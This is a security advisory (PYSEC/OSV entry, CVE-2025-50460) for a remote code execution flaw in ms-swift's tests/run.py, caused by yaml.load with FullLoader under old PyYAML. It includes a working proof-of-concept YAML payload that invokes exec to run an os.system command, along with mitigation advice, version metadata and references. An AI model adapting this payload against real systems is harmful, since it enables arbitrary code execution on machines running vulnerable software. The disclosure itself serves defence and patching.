PYSEC-2026-1683
Vulnerability from pysec - Published: 2026-07-07 16:02 - Updated: 2026-07-07 17:24
VLAI
Details
Description
A Remote Code Execution (RCE) vulnerability exists in the modelscope/ms-swift project due to unsafe use of yaml.load() in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the tests/run.py script, where a user-supplied YAML configuration file is deserialized using yaml.load() with yaml.FullLoader.
If an attacker can control or replace the YAML configuration file provided to the --run_config argument, they may inject a malicious payload that results in arbitrary code execution.
Affected Repository
- Project: modelscope/ms-swift
- Affect versions: latest
- File:
tests/run.py - GitHub Permalink: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
- Dependency: PyYAML <= 5.3.1
Vulnerable Code
if args.run_config is not None and Path(args.run_config).exists():
with open(args.run_config, encoding='utf-8') as f:
run_config = yaml.load(f, Loader=yaml.FullLoader)
Proof of Concept (PoC)
Step 1: Create malicious YAML file (exploit.yaml)
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"
Step 2: Execute with vulnerable PyYAML (<= 5.3.1)
import yaml
with open("exploit.yaml", "r") as f:
cfg = yaml.load(f, Loader=yaml.FullLoader)
This results in execution of os.system, proving code execution.
Mitigation
- Replace
yaml.load()withyaml.safe_load() - Upgrade PyYAML to version 5.4 or later
Example Fix:
# Before
yaml.load(f, Loader=yaml.FullLoader)
# After
yaml.safe_load(f)
Author
- Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩)
- Contact: [anchor.rongyu020221@gmail.com]
Severity
Impacted products
| Name | purl | ms-swift | pkg:pypi/ms-swift |
|---|
Aliases
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "ms-swift",
"purl": "pkg:pypi/ms-swift"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.6.3"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"1.0.0",
"1.1.0",
"1.2.0",
"1.2.1",
"1.3.0",
"1.4.0",
"1.5.0",
"1.5.1",
"1.5.2",
"1.5.3",
"1.5.4",
"1.6.0",
"1.6.1",
"1.6.2",
"1.6.3",
"1.7.0",
"1.7.1",
"1.7.2",
"1.7.3",
"2.0.0",
"2.0.1",
"2.0.2",
"2.0.3",
"2.0.3.post1",
"2.0.4",
"2.0.5",
"2.0.5.post1",
"2.1.0",
"2.1.1",
"2.1.1.post1",
"2.1.1.post2",
"2.2.0",
"2.2.1",
"2.2.2",
"2.2.3",
"2.2.4",
"2.2.5",
"2.3.0",
"2.3.0.post1",
"2.3.1",
"2.3.2",
"2.3.2.post1",
"2.4.0",
"2.4.0.post1",
"2.4.1",
"2.4.2",
"2.4.2.post1",
"2.4.2.post2",
"2.5.0.post1",
"2.5.1",
"2.5.1.post1",
"2.5.2",
"2.5.2.post1",
"2.6.0",
"2.6.0.post1",
"2.6.0.post2",
"2.6.1",
"3.0.0",
"3.0.1",
"3.0.1.post1",
"3.0.2",
"3.0.2.post1",
"3.0.3",
"3.1.0",
"3.1.1",
"3.1.1.post1",
"3.2.0",
"3.2.0.post2",
"3.2.1",
"3.2.2",
"3.3.0",
"3.3.0.post1",
"3.3.1",
"3.4.0",
"3.4.1",
"3.4.1.post1",
"3.5.0",
"3.5.1",
"3.5.2",
"3.5.3",
"3.6.0",
"3.6.1",
"3.6.2",
"3.6.3"
]
}
],
"aliases": [
"CVE-2025-50460",
"GHSA-fm6c-f59h-7mmg"
],
"details": "## Description\n\nA Remote Code Execution (RCE) vulnerability exists in the [modelscope/ms-swift](https://github.com/modelscope/ms-swift) project due to unsafe use of `yaml.load()` in combination with vulnerable versions of the PyYAML library (\u2264 5.3.1). The issue resides in the `tests/run.py` script, where a user-supplied YAML configuration file is deserialized using `yaml.load()` with `yaml.FullLoader`.\n\nIf an attacker can control or replace the YAML configuration file provided to the `--run_config` argument, they may inject a malicious payload that results in arbitrary code execution.\n\n## Affected Repository\n\n- **Project:** [modelscope/ms-swift](https://github.com/modelscope/ms-swift)\n- **Affect versions:** latest\n- **File:** `tests/run.py`\n- **GitHub Permalink:** https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420\n- **Dependency:** PyYAML \u003c= 5.3.1\n\n## Vulnerable Code\n\n```python\nif args.run_config is not None and Path(args.run_config).exists():\n with open(args.run_config, encoding=\u0027utf-8\u0027) as f:\n run_config = yaml.load(f, Loader=yaml.FullLoader)\n```\n\n## Proof of Concept (PoC)\n\n### Step 1: Create malicious YAML file (`exploit.yaml`)\n\n```yaml\n!!python/object/new:type\nargs: [\"z\", !!python/tuple [], {\"extend\": !!python/name:exec }]\nlistitems: \"__import__(\u0027os\u0027).system(\u0027mkdir HACKED\u0027)\"\n```\n\n### Step 2: Execute with vulnerable PyYAML (\u003c= 5.3.1)\n\n```python\nimport yaml\n\nwith open(\"exploit.yaml\", \"r\") as f:\n cfg = yaml.load(f, Loader=yaml.FullLoader)\n```\n\nThis results in execution of `os.system`, proving code execution.\n\n## Mitigation\n\n* Replace `yaml.load()` with `yaml.safe_load()`\n* Upgrade PyYAML to version 5.4 or later\n\n### Example Fix:\n\n```python\n# Before\nyaml.load(f, Loader=yaml.FullLoader)\n\n# After\nyaml.safe_load(f)\n```\n\n\n## Author\n\n* Discovered by: Yu Rong (\u620e\u8a89) and Hao Fan (\u51e1\u6d69)\n* Contact: *\\[[anchor.rongyu020221@gmail.com](mailto:anchor.rongyu020221@gmail.com)]*",
"id": "PYSEC-2026-1683",
"modified": "2026-07-07T17:24:46.820888Z",
"published": "2026-07-07T16:02:59.265625Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/modelscope/ms-swift/security/advisories/GHSA-fm6c-f59h-7mmg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50460"
},
{
"type": "WEB",
"url": "https://github.com/modelscope/ms-swift/pull/5174"
},
{
"type": "WEB",
"url": "https://github.com/modelscope/ms-swift/commit/b3418ed9b050dc079553c275c5ed14cfb2b66cf7"
},
{
"type": "WEB",
"url": "https://github.com/Anchor0221/CVE-2025-50460"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-6757-jp84-gxfx"
},
{
"type": "PACKAGE",
"url": "https://github.com/modelscope/ms-swift"
},
{
"type": "WEB",
"url": "https://github.com/modelscope/ms-swift/blob/main/tests/run.py#L420"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/ms-swift"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-fm6c-f59h-7mmg"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "MS SWIFT Remote Code Execution via unsafe PyYAML deserialization"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…